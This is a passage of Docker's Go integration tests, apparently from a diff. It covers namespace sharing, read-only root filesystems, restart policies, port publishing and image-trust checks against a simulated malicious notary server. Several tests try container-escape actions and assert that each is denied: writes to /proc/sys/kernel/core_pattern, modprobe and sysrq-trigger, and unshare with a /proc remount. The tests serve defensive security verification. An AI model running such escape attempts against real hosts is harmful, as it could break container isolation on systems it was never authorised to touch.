dockerCmd(c, "create", "busybox") + + id := strings.TrimSpace(out) + out, _, err := dockerCmdWithError("run", fmt.Sprintf("--pid=container:%s", id), "busybox") + if err == nil { + c.Fatalf("Run container with pid mode container should fail with non running container: %s\n%s", out, err) + } +} + +func (s *DockerSuite) TestRunMountShmMqueueFromHost(c *check.C) { + // Not applicable on Windows as uses Unix-specific capabilities + testRequires(c, SameHostDaemon, DaemonIsLinux, NotUserNamespace) + + dockerCmd(c, "run", "-d", "--name", "shmfromhost", "-v", "/dev/shm:/dev/shm", "-v", "/dev/mqueue:/dev/mqueue", "busybox", "sh", "-c", "echo -n test > /dev/shm/test && touch /dev/mqueue/toto && top") + defer os.Remove("/dev/mqueue/toto") + defer os.Remove("/dev/shm/test") + volPath, err := inspectMountSourceField("shmfromhost", "/dev/shm") + c.Assert(err, checker.IsNil) + if volPath != "/dev/shm" { + c.Fatalf("volumePath should have been /dev/shm, was %s", volPath) + } + + out, _ := dockerCmd(c, "run", "--name", "ipchost", "--ipc", "host", "busybox", "cat", "/dev/shm/test") + if out != "test" { + c.Fatalf("Output of /dev/shm/test expected test but found: %s", out) + } + + // Check that the mq was created + if _, err := os.Stat("/dev/mqueue/toto"); err != nil { + c.Fatalf("Failed to confirm '/dev/mqueue/toto' presence on host: %s", err.Error()) + } +} + +func (s *DockerSuite) TestContainerNetworkMode(c *check.C) { + // Not applicable on Windows as uses Unix-specific capabilities + testRequires(c, SameHostDaemon, DaemonIsLinux) + + out, _ := dockerCmd(c, "run", "-d", "busybox", "top") + id := strings.TrimSpace(out) + c.Assert(waitRun(id), check.IsNil) + pid1 := inspectField(c, id, "State.Pid") + + parentContainerNet, err := os.Readlink(fmt.Sprintf("/proc/%s/ns/net", pid1)) + if err != nil { + c.Fatal(err) + } + + out, _ = dockerCmd(c, "run", fmt.Sprintf("--net=container:%s", id), "busybox", "readlink", "/proc/self/ns/net") + out = strings.Trim(out, "\n") + if parentContainerNet != out { + c.Fatalf("NET different with --net=container:%s %s != %s\n", id, parentContainerNet, out) + } +} + +func (s *DockerSuite) TestRunModePIDHost(c *check.C) { + // Not applicable on Windows as uses Unix-specific capabilities + testRequires(c, SameHostDaemon, DaemonIsLinux, NotUserNamespace) + + hostPid, err := os.Readlink("/proc/1/ns/pid") + if err != nil { + c.Fatal(err) + } + + out, _ := dockerCmd(c, "run", "--pid=host", "busybox", "readlink", "/proc/self/ns/pid") + out = strings.Trim(out, "\n") + if hostPid != out { + c.Fatalf("PID different with --pid=host %s != %s\n", hostPid, out) + } + + out, _ = dockerCmd(c, "run", "busybox", "readlink", "/proc/self/ns/pid") + out = strings.Trim(out, "\n") + if hostPid == out { + c.Fatalf("PID should be different without --pid=host %s == %s\n", hostPid, out) + } +} + +func (s *DockerSuite) TestRunModeUTSHost(c *check.C) { + // Not applicable on Windows as uses Unix-specific capabilities + testRequires(c, SameHostDaemon, DaemonIsLinux) + + hostUTS, err := os.Readlink("/proc/1/ns/uts") + if err != nil { + c.Fatal(err) + } + + out, _ := dockerCmd(c, "run", "--uts=host", "busybox", "readlink", "/proc/self/ns/uts") + out = strings.Trim(out, "\n") + if hostUTS != out { + c.Fatalf("UTS different with --uts=host %s != %s\n", hostUTS, out) + } + + out, _ = dockerCmd(c, "run", "busybox", "readlink", "/proc/self/ns/uts") + out = strings.Trim(out, "\n") + if hostUTS == out { + c.Fatalf("UTS should be different without --uts=host %s == %s\n", hostUTS, out) + } + + out, _ = dockerCmdWithFail(c, "run", "-h=name", "--uts=host", "busybox", "ps") + c.Assert(out, checker.Contains, runconfig.ErrConflictUTSHostname.Error()) +} + +func (s *DockerSuite) TestRunTLSVerify(c *check.C) { + // Remote daemons use TLS and this test is not applicable when TLS is required. + testRequires(c, SameHostDaemon) + if out, code, err := dockerCmdWithError("ps"); err != nil || code != 0 { + c.Fatalf("Should have worked: %v:\n%v", err, out) + } + + // Regardless of whether we specify true or false we need to + // test to make sure tls is turned on if --tlsverify is specified at all + result := dockerCmdWithResult("--tlsverify=false", "ps") + result.Assert(c, icmd.Expected{ExitCode: 1, Err: "error during connect"}) + + result = dockerCmdWithResult("--tlsverify=true", "ps") + result.Assert(c, icmd.Expected{ExitCode: 1, Err: "cert"}) +} + +func (s *DockerSuite) TestRunPortFromDockerRangeInUse(c *check.C) { + // TODO Windows. Once moved to libnetwork/CNM, this may be able to be + // re-instated. + testRequires(c, DaemonIsLinux) + // first find allocator current position + out, _ := dockerCmd(c, "run", "-d", "-p", ":80", "busybox", "top") + + id := strings.TrimSpace(out) + out, _ = dockerCmd(c, "port", id) + + out = strings.TrimSpace(out) + if out == "" { + c.Fatal("docker port command output is empty") + } + out = strings.Split(out, ":")[1] + lastPort, err := strconv.Atoi(out) + if err != nil { + c.Fatal(err) + } + port := lastPort + 1 + l, err := net.Listen("tcp", ":"+strconv.Itoa(port)) + if err != nil { + c.Fatal(err) + } + defer l.Close() + + out, _ = dockerCmd(c, "run", "-d", "-p", ":80", "busybox", "top") + + id = strings.TrimSpace(out) + dockerCmd(c, "port", id) +} + +func (s *DockerSuite) TestRunTTYWithPipe(c *check.C) { + errChan := make(chan error) + go func() { + defer close(errChan) + + cmd := exec.Command(dockerBinary, "run", "-ti", "busybox", "true") + if _, err := cmd.StdinPipe(); err != nil { + errChan <- err + return + } + + expected := "the input device is not a TTY" + if runtime.GOOS == "windows" { + expected += ". If you are using mintty, try prefixing the command with 'winpty'" + } + if out, _, err := runCommandWithOutput(cmd); err == nil { + errChan <- fmt.Errorf("run should have failed") + return + } else if !strings.Contains(out, expected) { + errChan <- fmt.Errorf("run failed with error %q: expected %q", out, expected) + return + } + }() + + select { + case err := <-errChan: + c.Assert(err, check.IsNil) + case <-time.After(30 * time.Second): + c.Fatal("container is running but should have failed") + } +} + +func (s *DockerSuite) TestRunNonLocalMacAddress(c *check.C) { + addr := "00:16:3E:08:00:50" + args := []string{"run", "--mac-address", addr} + expected := addr + + if daemonPlatform != "windows" { + args = append(args, "busybox", "ifconfig") + } else { + args = append(args, WindowsBaseImage, "ipconfig", "/all") + expected = strings.Replace(strings.ToUpper(addr), ":", "-", -1) + } + + if out, _ := dockerCmd(c, args...); !strings.Contains(out, expected) { + c.Fatalf("Output should have contained %q: %s", expected, out) + } +} + +func (s *DockerSuite) TestRunNetHost(c *check.C) { + // Not applicable on Windows as uses Unix-specific capabilities + testRequires(c, SameHostDaemon, DaemonIsLinux, NotUserNamespace) + + hostNet, err := os.Readlink("/proc/1/ns/net") + if err != nil { + c.Fatal(err) + } + + out, _ := dockerCmd(c, "run", "--net=host", "busybox", "readlink", "/proc/self/ns/net") + out = strings.Trim(out, "\n") + if hostNet != out { + c.Fatalf("Net namespace different with --net=host %s != %s\n", hostNet, out) + } + + out, _ = dockerCmd(c, "run", "busybox", "readlink", "/proc/self/ns/net") + out = strings.Trim(out, "\n") + if hostNet == out { + c.Fatalf("Net namespace should be different without --net=host %s == %s\n", hostNet, out) + } +} + +func (s *DockerSuite) TestRunNetHostTwiceSameName(c *check.C) { + // TODO Windows. As Windows networking evolves and converges towards + // CNM, this test may be possible to enable on Windows. + testRequires(c, SameHostDaemon, DaemonIsLinux, NotUserNamespace) + + dockerCmd(c, "run", "--rm", "--name=thost", "--net=host", "busybox", "true") + dockerCmd(c, "run", "--rm", "--name=thost", "--net=host", "busybox", "true") +} + +func (s *DockerSuite) TestRunNetContainerWhichHost(c *check.C) { + // Not applicable on Windows as uses Unix-specific capabilities + testRequires(c, SameHostDaemon, DaemonIsLinux, NotUserNamespace) + + hostNet, err := os.Readlink("/proc/1/ns/net") + if err != nil { + c.Fatal(err) + } + + dockerCmd(c, "run", "-d", "--net=host", "--name=test", "busybox", "top") + + out, _ := dockerCmd(c, "run", "--net=container:test", "busybox", "readlink", "/proc/self/ns/net") + out = strings.Trim(out, "\n") + if hostNet != out { + c.Fatalf("Container should have host network namespace") + } +} + +func (s *DockerSuite) TestRunAllowPortRangeThroughPublish(c *check.C) { + // TODO Windows. This may be possible to enable in the future. However, + // Windows does not currently support --expose, or populate the network + // settings seen through inspect. + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "--expose", "3000-3003", "-p", "3000-3003", "busybox", "top") + + id := strings.TrimSpace(out) + portstr := inspectFieldJSON(c, id, "NetworkSettings.Ports") + + var ports nat.PortMap + err := json.Unmarshal([]byte(portstr), &ports) + c.Assert(err, checker.IsNil, check.Commentf("failed to unmarshal: %v", portstr)) + for port, binding := range ports { + portnum, _ := strconv.Atoi(strings.Split(string(port), "/")[0]) + if portnum < 3000 || portnum > 3003 { + c.Fatalf("Port %d is out of range ", portnum) + } + if binding == nil || len(binding) != 1 || len(binding[0].HostPort) == 0 { + c.Fatal("Port is not mapped for the port "+port, out) + } + } +} + +func (s *DockerSuite) TestRunSetDefaultRestartPolicy(c *check.C) { + runSleepingContainer(c, "--name=testrunsetdefaultrestartpolicy") + out := inspectField(c, "testrunsetdefaultrestartpolicy", "HostConfig.RestartPolicy.Name") + if out != "no" { + c.Fatalf("Set default restart policy failed") + } +} + +func (s *DockerSuite) TestRunRestartMaxRetries(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "--restart=on-failure:3", "busybox", "false") + timeout := 10 * time.Second + if daemonPlatform == "windows" { + timeout = 120 * time.Second + } + + id := strings.TrimSpace(string(out)) + if err := waitInspect(id, "{{ .State.Restarting }} {{ .State.Running }}", "false false", timeout); err != nil { + c.Fatal(err) + } + + count := inspectField(c, id, "RestartCount") + if count != "3" { + c.Fatalf("Container was restarted %s times, expected %d", count, 3) + } + + MaximumRetryCount := inspectField(c, id, "HostConfig.RestartPolicy.MaximumRetryCount") + if MaximumRetryCount != "3" { + c.Fatalf("Container Maximum Retry Count is %s, expected %s", MaximumRetryCount, "3") + } +} + +func (s *DockerSuite) TestRunContainerWithWritableRootfs(c *check.C) { + dockerCmd(c, "run", "--rm", "busybox", "touch", "/file") +} + +func (s *DockerSuite) TestRunContainerWithReadonlyRootfs(c *check.C) { + // Not applicable on Windows which does not support --read-only + testRequires(c, DaemonIsLinux, UserNamespaceROMount) + + testPriv := true + // don't test privileged mode subtest if user namespaces enabled + if root := os.Getenv("DOCKER_REMAP_ROOT"); root != "" { + testPriv = false + } + testReadOnlyFile(c, testPriv, "/file", "/etc/hosts", "/etc/resolv.conf", "/etc/hostname", "/sys/kernel", "/dev/.dont.touch.me") +} + +func (s *DockerSuite) TestPermissionsPtsReadonlyRootfs(c *check.C) { + // Not applicable on Windows due to use of Unix specific functionality, plus + // the use of --read-only which is not supported. + testRequires(c, DaemonIsLinux, UserNamespaceROMount) + + // Ensure we have not broken writing /dev/pts + out, status := dockerCmd(c, "run", "--read-only", "--rm", "busybox", "mount") + if status != 0 { + c.Fatal("Could not obtain mounts when checking /dev/pts mntpnt.") + } + expected := "type devpts (rw," + if !strings.Contains(string(out), expected) { + c.Fatalf("expected output to contain %s but contains %s", expected, out) + } +} + +func testReadOnlyFile(c *check.C, testPriv bool, filenames ...string) { + touch := "touch " + strings.Join(filenames, " ") + out, _, err := dockerCmdWithError("run", "--read-only", "--rm", "busybox", "sh", "-c", touch) + c.Assert(err, checker.NotNil) + + for _, f := range filenames { + expected := "touch: " + f + ": Read-only file system" + c.Assert(out, checker.Contains, expected) + } + + if !testPriv { + return + } + + out, _, err = dockerCmdWithError("run", "--read-only", "--privileged", "--rm", "busybox", "sh", "-c", touch) + c.Assert(err, checker.NotNil) + + for _, f := range filenames { + expected := "touch: " + f + ": Read-only file system" + c.Assert(out, checker.Contains, expected) + } +} + +func (s *DockerSuite) TestRunContainerWithReadonlyEtcHostsAndLinkedContainer(c *check.C) { + // Not applicable on Windows which does not support --link + testRequires(c, DaemonIsLinux, UserNamespaceROMount) + + dockerCmd(c, "run", "-d", "--name", "test-etc-hosts-ro-linked", "busybox", "top") + + out, _ := dockerCmd(c, "run", "--read-only", "--link", "test-etc-hosts-ro-linked:testlinked", "busybox", "cat", "/etc/hosts") + if !strings.Contains(string(out), "testlinked") { + c.Fatal("Expected /etc/hosts to be updated even if --read-only enabled") + } +} + +func (s *DockerSuite) TestRunContainerWithReadonlyRootfsWithDNSFlag(c *check.C) { + // Not applicable on Windows which does not support either --read-only or --dns. + testRequires(c, DaemonIsLinux, UserNamespaceROMount) + + out, _ := dockerCmd(c, "run", "--read-only", "--dns", "1.1.1.1", "busybox", "/bin/cat", "/etc/resolv.conf") + if !strings.Contains(string(out), "1.1.1.1") { + c.Fatal("Expected /etc/resolv.conf to be updated even if --read-only enabled and --dns flag used") + } +} + +func (s *DockerSuite) TestRunContainerWithReadonlyRootfsWithAddHostFlag(c *check.C) { + // Not applicable on Windows which does not support --read-only + testRequires(c, DaemonIsLinux, UserNamespaceROMount) + + out, _ := dockerCmd(c, "run", "--read-only", "--add-host", "testreadonly:127.0.0.1", "busybox", "/bin/cat", "/etc/hosts") + if !strings.Contains(string(out), "testreadonly") { + c.Fatal("Expected /etc/hosts to be updated even if --read-only enabled and --add-host flag used") + } +} + +func (s *DockerSuite) TestRunVolumesFromRestartAfterRemoved(c *check.C) { + prefix, _ := getPrefixAndSlashFromDaemonPlatform() + runSleepingContainer(c, "--name=voltest", "-v", prefix+"/foo") + runSleepingContainer(c, "--name=restarter", "--volumes-from", "voltest") + + // Remove the main volume container and restart the consuming container + dockerCmd(c, "rm", "-f", "voltest") + + // This should not fail since the volumes-from were already applied + dockerCmd(c, "restart", "restarter") +} + +// run container with --rm should remove container if exit code != 0 +func (s *DockerSuite) TestRunContainerWithRmFlagExitCodeNotEqualToZero(c *check.C) { + name := "flowers" + out, _, err := dockerCmdWithError("run", "--name", name, "--rm", "busybox", "ls", "/notexists") + if err == nil { + c.Fatal("Expected docker run to fail", out, err) + } + + out, err = getAllContainers() + if err != nil { + c.Fatal(out, err) + } + + if out != "" { + c.Fatal("Expected not to have containers", out) + } +} + +func (s *DockerSuite) TestRunContainerWithRmFlagCannotStartContainer(c *check.C) { + name := "sparkles" + out, _, err := dockerCmdWithError("run", "--name", name, "--rm", "busybox", "commandNotFound") + if err == nil { + c.Fatal("Expected docker run to fail", out, err) + } + + out, err = getAllContainers() + if err != nil { + c.Fatal(out, err) + } + + if out != "" { + c.Fatal("Expected not to have containers", out) + } +} + +func (s *DockerSuite) TestRunPIDHostWithChildIsKillable(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, DaemonIsLinux, NotUserNamespace) + name := "ibuildthecloud" + dockerCmd(c, "run", "-d", "--pid=host", "--name", name, "busybox", "sh", "-c", "sleep 30; echo hi") + + c.Assert(waitRun(name), check.IsNil) + + errchan := make(chan error) + go func() { + if out, _, err := dockerCmdWithError("kill", name); err != nil { + errchan <- fmt.Errorf("%v:\n%s", err, out) + } + close(errchan) + }() + select { + case err := <-errchan: + c.Assert(err, check.IsNil) + case <-time.After(5 * time.Second): + c.Fatal("Kill container timed out") + } +} + +func (s *DockerSuite) TestRunWithTooSmallMemoryLimit(c *check.C) { + // TODO Windows. This may be possible to enable once Windows supports + // memory limits on containers + testRequires(c, DaemonIsLinux) + // this memory limit is 1 byte less than the min, which is 4MB + // https://github.com/docker/docker/blob/v1.5.0/daemon/create.go#L22 + out, _, err := dockerCmdWithError("run", "-m", "4194303", "busybox") + if err == nil || !strings.Contains(out, "Minimum memory limit allowed is 4MB") { + c.Fatalf("expected run to fail when using too low a memory limit: %q", out) + } +} + +func (s *DockerSuite) TestRunWriteToProcAsound(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, DaemonIsLinux) + _, code, err := dockerCmdWithError("run", "busybox", "sh", "-c", "echo 111 >> /proc/asound/version") + if err == nil || code == 0 { + c.Fatal("standard container should not be able to write to /proc/asound") + } +} + +func (s *DockerSuite) TestRunReadProcTimer(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, DaemonIsLinux) + out, code, err := dockerCmdWithError("run", "busybox", "cat", "/proc/timer_stats") + if code != 0 { + return + } + if err != nil { + c.Fatal(err) + } + if strings.Trim(out, "\n ") != "" { + c.Fatalf("expected to receive no output from /proc/timer_stats but received %q", out) + } +} + +func (s *DockerSuite) TestRunReadProcLatency(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, DaemonIsLinux) + // some kernels don't have this configured so skip the test if this file is not found + // on the host running the tests. + if _, err := os.Stat("/proc/latency_stats"); err != nil { + c.Skip("kernel doesn't have latency_stats configured") + return + } + out, code, err := dockerCmdWithError("run", "busybox", "cat", "/proc/latency_stats") + if code != 0 { + return + } + if err != nil { + c.Fatal(err) + } + if strings.Trim(out, "\n ") != "" { + c.Fatalf("expected to receive no output from /proc/latency_stats but received %q", out) + } +} + +func (s *DockerSuite) TestRunReadFilteredProc(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, Apparmor, DaemonIsLinux, NotUserNamespace) + + testReadPaths := []string{ + "/proc/latency_stats", + "/proc/timer_stats", + "/proc/kcore", + } + for i, filePath := range testReadPaths { + name := fmt.Sprintf("procsieve-%d", i) + shellCmd := fmt.Sprintf("exec 3<%s", filePath) + + out, exitCode, err := dockerCmdWithError("run", "--privileged", "--security-opt", "apparmor=docker-default", "--name", name, "busybox", "sh", "-c", shellCmd) + if exitCode != 0 { + return + } + if err != nil { + c.Fatalf("Open FD for read should have failed with permission denied, got: %s, %v", out, err) + } + } +} + +func (s *DockerSuite) TestMountIntoProc(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, DaemonIsLinux) + _, code, err := dockerCmdWithError("run", "-v", "/proc//sys", "busybox", "true") + if err == nil || code == 0 { + c.Fatal("container should not be able to mount into /proc") + } +} + +func (s *DockerSuite) TestMountIntoSys(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, DaemonIsLinux) + testRequires(c, NotUserNamespace) + dockerCmd(c, "run", "-v", "/sys/fs/cgroup", "busybox", "true") +} + +func (s *DockerSuite) TestRunUnshareProc(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, Apparmor, DaemonIsLinux, NotUserNamespace) + + // In this test goroutines are used to run test cases in parallel to prevent the test from taking a long time to run. + errChan := make(chan error) + + go func() { + name := "acidburn" + out, _, err := dockerCmdWithError("run", "--name", name, "--security-opt", "seccomp=unconfined", "debian:jessie", "unshare", "-p", "-m", "-f", "-r", "--mount-proc=/proc", "mount") + if err == nil || + !(strings.Contains(strings.ToLower(out), "permission denied") || + strings.Contains(strings.ToLower(out), "operation not permitted")) { + errChan <- fmt.Errorf("unshare with --mount-proc should have failed with 'permission denied' or 'operation not permitted', got: %s, %v", out, err) + } else { + errChan <- nil + } + }() + + go func() { + name := "cereal" + out, _, err := dockerCmdWithError("run", "--name", name, "--security-opt", "seccomp=unconfined", "debian:jessie", "unshare", "-p", "-m", "-f", "-r", "mount", "-t", "proc", "none", "/proc") + if err == nil || + !(strings.Contains(strings.ToLower(out), "mount: cannot mount none") || + strings.Contains(strings.ToLower(out), "permission denied") || + strings.Contains(strings.ToLower(out), "operation not permitted")) { + errChan <- fmt.Errorf("unshare and mount of /proc should have failed with 'mount: cannot mount none' or 'permission denied', got: %s, %v", out, err) + } else { + errChan <- nil + } + }() + + /* Ensure still fails if running privileged with the default policy */ + go func() { + name := "crashoverride" + out, _, err := dockerCmdWithError("run", "--privileged", "--security-opt", "seccomp=unconfined", "--security-opt", "apparmor=docker-default", "--name", name, "debian:jessie", "unshare", "-p", "-m", "-f", "-r", "mount", "-t", "proc", "none", "/proc") + if err == nil || + !(strings.Contains(strings.ToLower(out), "mount: cannot mount none") || + strings.Contains(strings.ToLower(out), "permission denied") || + strings.Contains(strings.ToLower(out), "operation not permitted")) { + errChan <- fmt.Errorf("privileged unshare with apparmor should have failed with 'mount: cannot mount none' or 'permission denied', got: %s, %v", out, err) + } else { + errChan <- nil + } + }() + + for i := 0; i < 3; i++ { + err := <-errChan + if err != nil { + c.Fatal(err) + } + } +} + +func (s *DockerSuite) TestRunPublishPort(c *check.C) { + // TODO Windows: This may be possible once Windows moves to libnetwork and CNM + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "-d", "--name", "test", "--expose", "8080", "busybox", "top") + out, _ := dockerCmd(c, "port", "test") + out = strings.Trim(out, "\r\n") + if out != "" { + c.Fatalf("run without --publish-all should not publish port, out should be nil, but got: %s", out) + } +} + +// Issue #10184. +func (s *DockerSuite) TestDevicePermissions(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, DaemonIsLinux) + const permissions = "crw-rw-rw-" + out, status := dockerCmd(c, "run", "--device", "/dev/fuse:/dev/fuse:mrw", "busybox:latest", "ls", "-l", "/dev/fuse") + if status != 0 { + c.Fatalf("expected status 0, got %d", status) + } + if !strings.HasPrefix(out, permissions) { + c.Fatalf("output should begin with %q, got %q", permissions, out) + } +} + +func (s *DockerSuite) TestRunCapAddCHOWN(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "--cap-drop=ALL", "--cap-add=CHOWN", "busybox", "sh", "-c", "adduser -D -H newuser && chown newuser /home && echo ok") + + if actual := strings.Trim(out, "\r\n"); actual != "ok" { + c.Fatalf("expected output ok received %s", actual) + } +} + +// https://github.com/docker/docker/pull/14498 +func (s *DockerSuite) TestVolumeFromMixedRWOptions(c *check.C) { + prefix, slash := getPrefixAndSlashFromDaemonPlatform() + + dockerCmd(c, "run", "--name", "parent", "-v", prefix+"/test", "busybox", "true") + + // TODO Windows: Temporary check - remove once TP5 support is dropped + if daemonPlatform != "windows" || windowsDaemonKV >= 14350 { + dockerCmd(c, "run", "--volumes-from", "parent:ro", "--name", "test-volumes-1", "busybox", "true") + } + dockerCmd(c, "run", "--volumes-from", "parent:rw", "--name", "test-volumes-2", "busybox", "true") + + if daemonPlatform != "windows" { + mRO, err := inspectMountPoint("test-volumes-1", prefix+slash+"test") + c.Assert(err, checker.IsNil, check.Commentf("failed to inspect mount point")) + if mRO.RW { + c.Fatalf("Expected RO volume was RW") + } + } + + mRW, err := inspectMountPoint("test-volumes-2", prefix+slash+"test") + c.Assert(err, checker.IsNil, check.Commentf("failed to inspect mount point")) + if !mRW.RW { + c.Fatalf("Expected RW volume was RO") + } +} + +func (s *DockerSuite) TestRunWriteFilteredProc(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, Apparmor, DaemonIsLinux, NotUserNamespace) + + testWritePaths := []string{ + /* modprobe and core_pattern should both be denied by generic + * policy of denials for /proc/sys/kernel. These files have been + * picked to be checked as they are particularly sensitive to writes */ + "/proc/sys/kernel/modprobe", + "/proc/sys/kernel/core_pattern", + "/proc/sysrq-trigger", + "/proc/kcore", + } + for i, filePath := range testWritePaths { + name := fmt.Sprintf("writeprocsieve-%d", i) + + shellCmd := fmt.Sprintf("exec 3>%s", filePath) + out, code, err := dockerCmdWithError("run", "--privileged", "--security-opt", "apparmor=docker-default", "--name", name, "busybox", "sh", "-c", shellCmd) + if code != 0 { + return + } + if err != nil { + c.Fatalf("Open FD for write should have failed with permission denied, got: %s, %v", out, err) + } + } +} + +func (s *DockerSuite) TestRunNetworkFilesBindMount(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, SameHostDaemon, DaemonIsLinux) + + expected := "test123" + + filename := createTmpFile(c, expected) + defer os.Remove(filename) + + nwfiles := []string{"/etc/resolv.conf", "/etc/hosts", "/etc/hostname"} + + for i := range nwfiles { + actual, _ := dockerCmd(c, "run", "-v", filename+":"+nwfiles[i], "busybox", "cat", nwfiles[i]) + if actual != expected { + c.Fatalf("expected %s be: %q, but was: %q", nwfiles[i], expected, actual) + } + } +} + +func (s *DockerSuite) TestRunNetworkFilesBindMountRO(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, SameHostDaemon, DaemonIsLinux) + + filename := createTmpFile(c, "test123") + defer os.Remove(filename) + + nwfiles := []string{"/etc/resolv.conf", "/etc/hosts", "/etc/hostname"} + + for i := range nwfiles { + _, exitCode, err := dockerCmdWithError("run", "-v", filename+":"+nwfiles[i]+":ro", "busybox", "touch", nwfiles[i]) + if err == nil || exitCode == 0 { + c.Fatalf("run should fail because bind mount of %s is ro: exit code %d", nwfiles[i], exitCode) + } + } +} + +func (s *DockerSuite) TestRunNetworkFilesBindMountROFilesystem(c *check.C) { + // Not applicable on Windows as uses Unix specific functionality + testRequires(c, SameHostDaemon, DaemonIsLinux, UserNamespaceROMount) + + filename := createTmpFile(c, "test123") + defer os.Remove(filename) + + nwfiles := []string{"/etc/resolv.conf", "/etc/hosts", "/etc/hostname"} + + for i := range nwfiles { + _, exitCode := dockerCmd(c, "run", "-v", filename+":"+nwfiles[i], "--read-only", "busybox", "touch", nwfiles[i]) + if exitCode != 0 { + c.Fatalf("run should not fail because %s is mounted writable on read-only root filesystem: exit code %d", nwfiles[i], exitCode) + } + } + + for i := range nwfiles { + _, exitCode, err := dockerCmdWithError("run", "-v", filename+":"+nwfiles[i]+":ro", "--read-only", "busybox", "touch", nwfiles[i]) + if err == nil || exitCode == 0 { + c.Fatalf("run should fail because %s is mounted read-only on read-only root filesystem: exit code %d", nwfiles[i], exitCode) + } + } +} + +func (s *DockerTrustSuite) TestTrustedRun(c *check.C) { + // Windows does not support this functionality + testRequires(c, DaemonIsLinux) + repoName := s.setupTrustedImage(c, "trusted-run") + + // Try run + runCmd := exec.Command(dockerBinary, "run", repoName) + s.trustedCmd(runCmd) + out, _, err := runCommandWithOutput(runCmd) + if err != nil { + c.Fatalf("Error running trusted run: %s\n%s\n", err, out) + } + + if !strings.Contains(string(out), "Tagging") { + c.Fatalf("Missing expected output on trusted push:\n%s", out) + } + + dockerCmd(c, "rmi", repoName) + + // Try untrusted run to ensure we pushed the tag to the registry + runCmd = exec.Command(dockerBinary, "run", "--disable-content-trust=true", repoName) + s.trustedCmd(runCmd) + out, _, err = runCommandWithOutput(runCmd) + if err != nil { + c.Fatalf("Error running trusted run: %s\n%s", err, out) + } + + if !strings.Contains(string(out), "Status: Downloaded") { + c.Fatalf("Missing expected output on trusted run with --disable-content-trust:\n%s", out) + } +} + +func (s *DockerTrustSuite) TestUntrustedRun(c *check.C) { + // Windows does not support this functionality + testRequires(c, DaemonIsLinux) + repoName := fmt.Sprintf("%v/dockercliuntrusted/runtest:latest", privateRegistryURL) + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", repoName) + dockerCmd(c, "push", repoName) + dockerCmd(c, "rmi", repoName) + + // Try trusted run on untrusted tag + runCmd := exec.Command(dockerBinary, "run", repoName) + s.trustedCmd(runCmd) + out, _, err := runCommandWithOutput(runCmd) + if err == nil { + c.Fatalf("Error expected when running trusted run with:\n%s", out) + } + + if !strings.Contains(string(out), "does not have trust data for") { + c.Fatalf("Missing expected output on trusted run:\n%s", out) + } +} + +func (s *DockerTrustSuite) TestRunWhenCertExpired(c *check.C) { + // Windows does not support this functionality + testRequires(c, DaemonIsLinux) + c.Skip("Currently changes system time, causing instability") + repoName := s.setupTrustedImage(c, "trusted-run-expired") + + // Certificates have 10 years of expiration + elevenYearsFromNow := time.Now().Add(time.Hour * 24 * 365 * 11) + + runAtDifferentDate(elevenYearsFromNow, func() { + // Try run + runCmd := exec.Command(dockerBinary, "run", repoName) + s.trustedCmd(runCmd) + out, _, err := runCommandWithOutput(runCmd) + if err == nil { + c.Fatalf("Error running trusted run in the distant future: %s\n%s", err, out) + } + + if !strings.Contains(string(out), "could not validate the path to a trusted root") { + c.Fatalf("Missing expected output on trusted run in the distant future:\n%s", out) + } + }) + + runAtDifferentDate(elevenYearsFromNow, func() { + // Try run + runCmd := exec.Command(dockerBinary, "run", "--disable-content-trust", repoName) + s.trustedCmd(runCmd) + out, _, err := runCommandWithOutput(runCmd) + if err != nil { + c.Fatalf("Error running untrusted run in the distant future: %s\n%s", err, out) + } + + if !strings.Contains(string(out), "Status: Downloaded") { + c.Fatalf("Missing expected output on untrusted run in the distant future:\n%s", out) + } + }) +} + +func (s *DockerTrustSuite) TestTrustedRunFromBadTrustServer(c *check.C) { + // Windows does not support this functionality + testRequires(c, DaemonIsLinux) + repoName := fmt.Sprintf("%v/dockerclievilrun/trusted:latest", privateRegistryURL) + evilLocalConfigDir, err := ioutil.TempDir("", "evilrun-local-config-dir") + if err != nil { + c.Fatalf("Failed to create local temp dir") + } + + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", repoName) + + pushCmd := exec.Command(dockerBinary, "push", repoName) + s.trustedCmd(pushCmd) + out, _, err := runCommandWithOutput(pushCmd) + if err != nil { + c.Fatalf("Error running trusted push: %s\n%s", err, out) + } + if !strings.Contains(string(out), "Signing and pushing trust metadata") { + c.Fatalf("Missing expected output on trusted push:\n%s", out) + } + + dockerCmd(c, "rmi", repoName) + + // Try run + runCmd := exec.Command(dockerBinary, "run", repoName) + s.trustedCmd(runCmd) + out, _, err = runCommandWithOutput(runCmd) + if err != nil { + c.Fatalf("Error running trusted run: %s\n%s", err, out) + } + + if !strings.Contains(string(out), "Tagging") { + c.Fatalf("Missing expected output on trusted push:\n%s", out) + } + + dockerCmd(c, "rmi", repoName) + + // Kill the notary server, start a new "evil" one. + s.not.Close() + s.not, err = newTestNotary(c) + if err != nil { + c.Fatalf("Restarting notary server failed.") + } + + // In order to make an evil server, lets re-init a client (with a different trust dir) and push new data. + // tag an image and upload it to the private registry + dockerCmd(c, "--config", evilLocalConfigDir, "tag", "busybox", repoName) + + // Push up to the new server + pushCmd = exec.Command(dockerBinary, "--config", evilLocalConfigDir, "push", repoName) + s.trustedCmd(pushCmd) + out, _, err = runCommandWithOutput(pushCmd) + if err != nil { + c.Fatalf("Error running trusted push: %s\n%s", err, out) + } + if 